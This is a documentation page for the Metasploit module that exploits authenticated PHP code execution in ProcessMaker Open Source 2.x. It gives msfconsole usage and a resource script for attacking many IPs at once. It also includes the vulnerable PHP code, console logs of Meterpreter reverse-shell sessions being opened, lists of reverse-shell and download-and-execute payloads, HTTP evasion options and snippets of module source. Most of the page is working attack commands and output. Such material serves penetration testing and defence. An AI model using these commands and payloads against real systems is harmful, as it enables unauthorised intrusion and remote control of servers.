ProcessMaker Open Source Authenticated PHP Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/processmaker_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: ProcessMaker Open Source Authenticated PHP Code Execution
Module: exploit/multi/http/processmaker_exec
Source code: modules/exploits/multi/http/processmaker_exec.rb
Disclosure date: 2013-10-24
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a PHP code execution vulnerability in the 'neoclassic' skin for ProcessMaker Open Source which allows any authenticated user to execute PHP code. The vulnerable skin is installed by default in version 2.x and cannot be removed via the web interface.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using processmaker_exec against a single host

Normally, you can use exploit/multi/http/processmaker_exec this way:

msf > use exploit/multi/http/processmaker_exec
msf exploit(processmaker_exec) > show targets
    ... a list of targets ...
msf exploit(processmaker_exec) > set TARGET target-id
msf exploit(processmaker_exec) > show options
    ... show and set options ...
msf exploit(processmaker_exec) > exploit

Using processmaker_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your processmaker_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/processmaker_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a PHP code execution vulnerability in the default neoclassic skin for ProcessMaker Open Source which allows any authenticated user to execute PHP code. The vulnerable skin is installed by default in version 2.x prior to 2.5.2 and cannot be removed via the web interface.

Vulnerable Application


ProcessMaker is an open source, workflow management software suite, which includes tools to automate your workflow, design forms, create documents, assign roles and users, create routing rules, and map an individual process quickly and easily. It's relatively lightweight and doesn't require any kind of installation on the client computer.

This module has been tested successfully on ProcessMaker Open Source versions:

  • 2.5.1 on Windows XP SP3
  • 2.5.0 on Windows XP SP3
  • 2.0.45 on Debian Linux
  • 2.0.23 on Windows XP SP3

The vulnerability was patched in version 2.5.2.

Source and Installers:

Technical Details


Several files within the default neoclassic skin allow authenticated users to supply a PHP function in the action parameter and arguments for the aforementioned function in the params parameter. The application calls the supplied function name with the supplied parameters resulting in execution of arbitrary user supplied PHP code.

The relevant source code for the affected files is shown below.

appFolder/appFolderAjax.php

  if (($_REQUEST['action']) != 'rename') {
      $functionName = $_REQUEST ['action'];
      $functionParams = isset ($_REQUEST ['params']) ? $_REQUEST ['params'] : array ();
      $functionName ($functionParams);

cases/casesStartPage_Ajax.php

  $functionName = $_REQUEST['action'];
  $functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
  $functionName( $functionParams );

cases/cases_SchedulerGetPlugins.php

  $functionName = $_REQUEST['action'];
  $functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
  $functionName( $functionParams );

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/multi/http/processmaker_exec
  3. Do: set username [USER]
  4. Do: set password [PASS]
  5. Do: set workspace [WORKSPACE]
  6. Do: set rhost [IP]
  7. Do: run
  8. You should get a session

Options


Username

The username for a ProcessMaker user (default: admin).

Password

The password for the ProcessMaker user (default: admin).

Workspace

The ProcessMaker workspace for which the specified user has access (default: workflow).

Scenarios


  msf exploit(processmaker_exec) > check
  [*] 192.168.172.135:80 - Authenticating as user 'admin'
  [+] 192.168.172.135:80 - Authenticated as user 'admin'
  [*] 192.168.172.135:80 - Sending check
  [+] The target is vulnerable.

  msf exploit(processmaker_exec) > exploit
  [*] Started reverse handler on 192.168.172.1:4444
  [*] 192.168.172.135:80 - Authenticating as user 'admin'
  [+] 192.168.172.135:80 - Authenticated as user 'admin'
  [*] 192.168.172.135:80 - Sending payload 'V7hd5EevO9Ho.php' (1795 bytes)
  [+] 192.168.172.135:80 - Payload sent successfully
  [*] 192.168.172.135:80 - Retrieving file 'V7hd5EevO9Ho.php'
  [*] Sending stage (39195 bytes) to 192.168.172.135
  [*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.135:32789) at 2013-10-29 09:53:08 -0500
  [+] Deleted V7hd5EevO9Ho.php

  ^C[-] Exploit failed: Interrupt

  meterpreter > getuid
  Server username: www-data (33)
  meterpreter > sysinfo
  Computer    : processmaker
  OS          : Linux processmaker 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64
  Meterpreter : php/php
  meterpreter > exit

Go back to menu.

Msfconsole Usage


Here is how the multi/http/processmaker_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/processmaker_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/processmaker_exec) > show info

       Name: ProcessMaker Open Source Authenticated PHP Code Execution
     Module: exploit/multi/http/processmaker_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2013-10-24

Provided by:
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   ProcessMaker Open Source 2.x (PHP Payload)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin            yes       The password for ProcessMaker
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  USERNAME   admin            yes       The username for ProcessMaker
  VHOST                       no        HTTP server virtual host
  WORKSPACE  workflow         yes       The ProcessMaker workspace

Payload information:
  Space: 8190
  Avoid: 1 characters

Description:
  This module exploits a PHP code execution vulnerability in the 
  'neoclassic' skin for ProcessMaker Open Source which allows any 
  authenticated user to execute PHP code. The vulnerable skin is 
  installed by default in version 2.x and cannot be removed via the 
  web interface.

References:
  OSVDB (99199)
  http://www.securityfocus.com/bid/63411
  http://bugs.processmaker.com/view.php?id=13436

Module Options


This is a complete list of options available in the multi/http/processmaker_exec exploit:

msf6 exploit(multi/http/processmaker_exec) > show options

Module options (exploit/multi/http/processmaker_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       The password for ProcessMaker
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME   admin            yes       The username for ProcessMaker
   VHOST                       no        HTTP server virtual host
   WORKSPACE  workflow         yes       The ProcessMaker workspace

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   ProcessMaker Open Source 2.x (PHP Payload)

Advanced Options


Here is a complete list of advanced options supported by the multi/http/processmaker_exec exploit:

msf6 exploit(multi/http/processmaker_exec) > show advanced

Module advanced options (exploit/multi/http/processmaker_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                    workflow         no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/processmaker_exec module can exploit:

msf6 exploit(multi/http/processmaker_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   ProcessMaker Open Source 2.x (PHP Payload)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/processmaker_exec exploit:

msf6 exploit(multi/http/processmaker_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   18  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/processmaker_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/processmaker_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

100:	        'uri'       => normalize_uri(target_uri.path, "/sys#{@workspace}/en/neoclassic/login/authentication.php"),
101:	        'cookie'    => @cookie,
102:	        'vars_post' => vars_post
103:	      })
104:	    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
105:	      print_error("Connection failed")
106:	      return false
107:	    end
108:	    if res and res.code == 200 and res.body =~ /Loading styles and images/
109:	      print_good("Authenticated as user '#{user}'")
110:	      return true

Authenticating as user '<USER>' failed


Here is a relevant code snippet related to the "Authenticating as user '<USER>' failed" error message:

107:	    end
108:	    if res and res.code == 200 and res.body =~ /Loading styles and images/
109:	      print_good("Authenticated as user '#{user}'")
110:	      return true
111:	    else
112:	      print_error("Authenticating as user '#{user}' failed")
113:	      return false
114:	    end
115:	  end
116:	
117:	  #

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

135:	        return Exploit::CheckCode::Vulnerable
136:	      elsif res
137:	        return Exploit::CheckCode::Safe
138:	      end
139:	    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
140:	      vprint_error("Connection failed")
141:	      return Exploit::CheckCode::Unknown
142:	    end
143:	    Exploit::CheckCode::Safe
144:	  end
145:	

<PEER> - Sending payload failed


Here is a relevant code snippet related to the "<PEER> - Sending payload failed" error message:

162:	      res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } )
163:	      if res and res.code == 200
164:	        print_good("Payload sent successfully")
165:	        register_files_for_cleanup(@fname)
166:	      else
167:	        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
168:	      end
169:	    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
170:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
171:	    end
172:	  end

<PEER> - Connection failed


Here is a relevant code snippet related to the "<PEER> - Connection failed" error message:

165:	        register_files_for_cleanup(@fname)
166:	      else
167:	        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
168:	      end
169:	    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
170:	      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
171:	    end
172:	  end
173:	
174:	  def exploit
175:	    @workspace = datastore['WORKSPACE']

<PEER> - Authentication failed


Here is a relevant code snippet related to the "<PEER> - Authentication failed" error message:

175:	    @workspace = datastore['WORKSPACE']
176:	
177:	    # login
178:	    @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
179:	    unless login(datastore['USERNAME'], datastore['PASSWORD'])
180:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
181:	    end
182:	
183:	    # upload payload
184:	    @fname  = "#{rand_text_alphanumeric(rand(10)+10)}.php"
185:	    upload

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


bcoles

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.